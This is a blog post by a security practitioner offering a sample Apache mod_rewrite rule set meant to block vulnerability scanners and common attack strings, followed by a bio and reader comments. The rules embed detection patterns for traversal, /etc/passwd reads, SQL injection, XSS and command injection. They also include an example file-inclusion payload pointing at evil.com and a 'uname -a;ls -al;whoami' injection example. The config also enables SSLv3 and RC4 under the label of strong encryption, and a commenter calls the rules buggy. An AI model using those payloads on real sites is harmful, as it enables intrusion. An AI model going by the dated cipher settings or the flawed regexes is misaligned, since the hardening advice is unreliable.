Using mod_rewrite to harden Apache

Most installations of Apache should come with the mod_rewrite module already configured and active.  For those of you that are hosting the web server on a shared hosting environment (ie: you’ve bought a generic web hosting package), then you are forced to edit a file named .HTACCESS in order to setup the securities for your website.  In a dedicated hosting environment where you have full access to the server configuration HTTPD.CONF file, you can create global rules that will be INHERITED by each website ( also called a VirtualHost ) on your server.

If you are in control of a dedicated server, it should be considered a best practice to configure your apache server for the best security, and then allow particular account to have more flexibility as the need arises. The following guide can provide you some coding samples for setting up mod_rewrite security options that will prevent many common vulnerabilities from being exploited in Apache. I would highly recommend reading the documentation on mod_rewrite located at http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html before applying these samples in a production system.  As always, I would make sure the options are tested in a development environment to ensure that your results are consistent.

[php]# Sample Hardened Apache Mod_Rewrite Security Rule
# Ref: http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewritecond
# Some sections were provided by Aung Khant, http://yehg.net
#
# NC = ‘nocase|NC’ (no case-sensitive)
# OR = ‘ornext|OR’ (or next condition)
# L = last rule

#This turns on the rewrite engine in Apache
RewriteEngine on

# Force High level of SSL encryption
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLOptions +StrictRequire
SSLProtocol ALL +SSLv3 +TLSv1
SSLCipherSuite ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM
</IfModule>

#This section reads a blacklist text file of referrers and block access
#The text file entries are one per line in the format: http://website_url_referral_that_appears_in_access_log –
#The hyphen at the end is important as it separates entries and denotes the end of the line

RewriteMap deflector txt:/etc/httpd/conf/blacklist.txt
RewriteCond %{HTTP_REFERER} !=""
RewriteCond ${deflector:%{HTTP_REFERER}} ^-$
RewriteRule ^.* %{HTTP_REFERER} [R,L]

RewriteCond %{HTTP_REFERER} !=""
RewriteCond ${deflector:%{HTTP_REFERER}|NOT-FOUND} !=NOT-FOUND
RewriteRule ^.* ${deflector:%{HTTP_REFERER}} [R,L]

#This option turns off trace track methods
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* – [F]
TraceEnable off

# Allow only GET and POST verbs
# ‘Coz most vul scanners use HEAD for hunting buggy files existence
RewriteCond %{REQUEST_METHOD} !^(GET|POST)$ [NC,OR]

# Ban Non-GUI Browsers
RewriteCond %{HTTP_USER_AGENT} ^.*(lynx|wget).* [NC,OR]

# Ban Typical Vulnerability Scanners and others
RewriteCond %{HTTP_USER_AGENT} ^()$ [NC,OR] # void of UserAgent

# Known Web vulnerabilty Scanners
RewriteCond %{HTTP_USER_AGENT} ^.*(syhunt|sqlmap|WhatWeb|Netsparker|w3af|Nstalker|acunetix|qualys|nikto|wikto|pikto|pykto).* [NC,OR]

# Random Underground Web Exploit Scanners
RewriteCond %{HTTP_USER_AGENT} ^.*(javascript\:alert|0d\s0a|ZeW|SlimBrowser|drone|DataCha|SBIder|Shelob|MobileRunner|Microsoft\sOffice|Plesk|Itah|Mosill|Internet\sExplorer\s4\.01|al_viewer|NetSeer|MSFrontPage|Yandex|webcollage|lwp\-trivial|Isidorus|core\-project|\<script\>|Toata\sdragostea\smea\spentru\sdiavola|StackRambler|Firebat|Y\!J\-SRD|ZmEu|libwww|perl|java|curl|ruby|python|scan|kiss|ass|Morfeus|0wn|hack|h4x|h4x0r).* [NC,OR]

# Denial-of-Service Tool
RewriteCond %{HTTP_USER_AGENT} ^.*(ApacheBench).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(WWW\-Mechanize|revolt|Crawl|Mail\.Ru|Walker|sbide|findlinks|spide|Ace\sExplorer|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]

# Disable access to cgi-bins if not used
RewriteCond %{REQUEST_URI} ^/(cgi\.cgi|webcgi|cgi\-914|cgi\-915|bin|cgi|mpcgi|cgi\-bin|ows\-bin|cgi\-sys|cgi\-local|htbin|cgibin|cgis|scripts|cgi\-win|fcgi\-bin|cgi\-exe|cgi\-home|cgi\-perl|scgi\-bin)/ [NC,OR]

# Block out common attack strings
# Additional filtering can be put into
# HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE,HTTP_FORWARDED,HTTP_ACCEPT

# Directory Traversal, Null Byte Injection, HTTP Response Splitting
RewriteCond %{QUERY_STRING} ^.*(\.\.\/|\.\.%2f|\.\.%5C|\.\.%252F|\.\.%255C|\.\.%u2215|%u002e%u002e%u2215|%252e%252e%252f|%00|\\x00|\\u00|%5C00|%09|%0D%0A) [NC,OR]

# SQL Injection Probing
RewriteCond %{QUERY_STRING} ^.*(\@\@version|CHR\(|CHAR\(|UNION%20SELECT|/select/|/union/|/insert/|/update/|/delete/).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(or|and)%20([0-9]=[0-9]).* [NC,OR]

# Remote/Local File Inclusion
# RFI: yoursite.com/?pg=http://evil.com/shell.txt?
# LFI: yoursite.com/?pg=/logs/access_log?
RewriteCond %{QUERY_STRING} .*(=https|=http|=ftp)(://|%3a%2f%2f).*\?$ [NC,OR]
RewriteCond %{QUERY_STRING} (\/access_log|boot\.ini|\/etc\/passwd|%2Fetc%2Fpasswd|c:\\boot\.ini|c%3A\\boot\.ini|c:\/boot\.ini|c:%2Fboot\.ini|c%3A%2Fboot\.ini|c:boot\.ini|c%3Aboot\.ini).* [NC,OR]

# PHP Version Probing
RewriteCond %{QUERY_STRING} ^(=PHP).* [NC,OR]

# XSS Probing
RewriteCond %{QUERY_STRING} ^.*(\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(/XSS/).* [NC,OR]

# PHP GLOBALS Overriding
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

# PHP REQUEST variable Overriding
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

# PHP Command Injection Probing
# vuln.php?exec=uname -a;ls -al;whoami
RewriteCond %{QUERY_STRING} ^.*(=|;)(uname%20-|ls%20-|whoami).*

# Deny access – Select one of the RewriteRules below:
#
# You can be nice and send the denial to an error page
# RewriteRule ^(.*)$ /path/to/friendly_errror.php [F,L]
# or
# Send them back to their own address
# RewriteRule ^(.*)$ http://%{REMOTE_ADDR} [R=301,L]
[/php]

This is just a sample of what can be done to increase your security posture with Apache. By leveraging mod_rewrite security options in your main configuration file, you can greatly increase the security of your web sites and reduce the amount of “noise” in your log files. If you want to learn more about the mod_rewrite system aka the Swiss Army Knife of URL manipulation?  Please check out this link to learn more and let us know if you figure out something worth passing on!

http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html

Happy Hunting !

Rick Lawhorn, CISSP, CISA, CHP, CHSS

Rick has over 20 years of experience in information technology which includes an extensive security, compliance, privacy and legal background. Rick has served as the Chief Information Security Officer (CISO) for two Fortune 100 companies and served in information technology and security leadership roles within multiple law firms, Department of Energy and the National White Collar Crime Center. He has been published in numerous international and domestic security magazines and currently serves on several advisory boards for new, innovative security products. He can be reached at rick.lawhorn@mac.com.

Share
You can leave a response, or trackback from your own site.
  • Pingback: Infosec Weekly Roundup | SecTechno

  • Test

    Who the **** wrote that *** of script? Filter rules that make apache crahs, senseless security-by-obscurity filter rules and regular expressions beginner’s mistakes. Fix that or delete it, please.